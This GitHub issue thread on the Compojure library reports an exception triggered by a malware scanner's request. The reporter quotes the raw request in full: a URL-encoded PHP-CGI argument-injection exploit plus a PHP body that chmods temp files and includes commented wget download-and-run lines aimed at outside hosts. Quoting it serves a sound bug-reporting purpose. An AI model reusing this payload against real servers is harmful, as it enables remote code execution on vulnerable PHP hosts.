search

weavejester / compojure

A concise routing library for Ring/Clojure
Eclipse Public License 1.0
4.09k stars 256 forks source link

Malware requests causing exceptions in assoc_route_params #115

Closed wiseman closed 10 years ago

wiseman commented 10 years ago

With compojure 1.1.8 I get exceptions from some malware scan requests.

The exception:

java.lang.ClassCastException: java.lang.String cannot be cast to clojure.lang.IPersistentCollection
    at clojure.core$conj.invoke(core.clj:83) ~[clojure-1.5.1.jar:na]
    at clojure.core$merge$fn__4275.invoke(core.clj:2684) ~[clojure-1.5.1.jar:na]
    at clojure.core$reduce1.invoke(core.clj:896) ~[clojure-1.5.1.jar:na]
    at clojure.core$reduce1.invoke(core.clj:887) ~[clojure-1.5.1.jar:na]
    at clojure.core$merge.doInvoke(core.clj:2684) ~[clojure-1.5.1.jar:na]
    at clojure.lang.RestFn.invoke(RestFn.java:421) ~[clojure-1.5.1.jar:na]
    at clojure.core$merge_with$merge_entry__4279.invoke(core.clj:2698) ~[clojure-1.5.1.jar:na]
    at clojure.core$reduce1.invoke(core.clj:896) ~[clojure-1.5.1.jar:na]
    at clojure.core$merge_with$merge2__4281.invoke(core.clj:2701) ~[clojure-1.5.1.jar:na]
    at clojure.core$reduce1.invoke(core.clj:896) ~[clojure-1.5.1.jar:na]
    at clojure.core$reduce1.invoke(core.clj:887) ~[clojure-1.5.1.jar:na]
    at clojure.core$merge_with.doInvoke(core.clj:2702) ~[clojure-1.5.1.jar:na]
    at clojure.lang.RestFn.invoke(RestFn.java:439) ~[clojure-1.5.1.jar:na]
    at compojure.core$assoc_route_params.invoke(core.clj:38) ~[na:na]
    at compojure.core$if_route$fn__771.invoke(core.clj:45) ~[na:na]
    at compojure.core$if_method$fn__764.invoke(core.clj:30) ~[na:na]
    at compojure.core$routing$fn__793.invoke(core.clj:112) ~[na:na]
    at clojure.core$some.invoke(core.clj:2443) ~[clojure-1.5.1.jar:na]
    at compojure.core$routing.doInvoke(core.clj:112) ~[na:na]
    at clojure.lang.RestFn.applyTo(RestFn.java:139) ~[clojure-1.5.1.jar:na]
    at clojure.core$apply.invoke(core.clj:619) ~[clojure-1.5.1.jar:na]
    at compojure.core$routes$fn__797.invoke(core.clj:117) ~[na:na]
    at ring.middleware.keyword_params$wrap_keyword_params$fn__7655.invoke(keyword_params.clj:35) ~[na:na]
    at ring.middleware.nested_params$wrap_nested_params$fn__7704.invoke(nested_params.clj:84) ~[na:na]
    at ring.middleware.params$wrap_params$fn__7621.invoke(params.clj:64) ~[na:na]
    at ring.middleware.multipart_params$wrap_multipart_params$fn__7747.invoke(multipart_params.clj:118) ~[na:na]
    at ring.middleware.flash$wrap_flash$fn__8522.invoke(flash.clj:35) ~[na:na]
    at ring.middleware.session$wrap_session$fn__8502.invoke(session.clj:98) ~[na:na]
    at com.morseproject.hurdygurdy.server$wrap_http_status_ex$fn__8556.invoke(server.clj:148) ~[na:na]
    at com.morseproject.hurdygurdy.server$wrap_exception$fn__8614.invoke(server.clj:310) ~[na:na]
    at ring.middleware.json$wrap_json_response$fn__6418.invoke(json.clj:65) [na:na]
    at org.httpkit.server.HttpHandler.run(RingHandler.java:91) [http-kit-2.1.17.jar:na]
    at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:471) [na:1.7.0_55]
    at java.util.concurrent.FutureTask.run(FutureTask.java:262) [na:1.7.0_55]
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) [na:1.7.0_55]
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) [na:1.7.0_55]
    at java.lang.Thread.run(Thread.java:744) [na:1.7.0_55]

The request:

POST /info.php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Connection: Keep-Alive
Content-Length: 538
Content-Type: application/x-www-form-urlencoded
Host: localhost
User-Agent: I'm a mu mu mu ?

<?php
$tmp = sys_get_temp_dir();
$path = getcwd();
$file = "gimp.html";
$url = "http://eleven11root.servepics.com";
//system("wget $url -P - -O" . $tmp . "/gimp.html");
//system("chmod -R 777" . $tmp ."/gimp.html");
chmod ($tmp."/".$file,0777);
//system($tmp . "/gimp.html");
$file2 = "g1mp.htm";
$url2 = "http://twelfe12root.servepics.com";
//system("wget $url2 -P - -O" . $tmp . "/g1mp.htm");
//system("chmod -R 777" . $tmp ."/g1mp.htm");
chmod ($tmp."/".$file2,0777);
//system($tmp . "/g1mp.htm");
echo $tmp;
echo $path;

die($tmp);
?>
weavejester commented 10 years ago

Let's keep this to the original issue, https://github.com/ring-clojure/ring/issues/155, until we can actually reproduce it. Compojure is throwing an error because it's been fed a malformed request, but that doesn't mean Compojure is causing the malformed request. I'm closing this issue so that we're not dealing with this problem in two projects.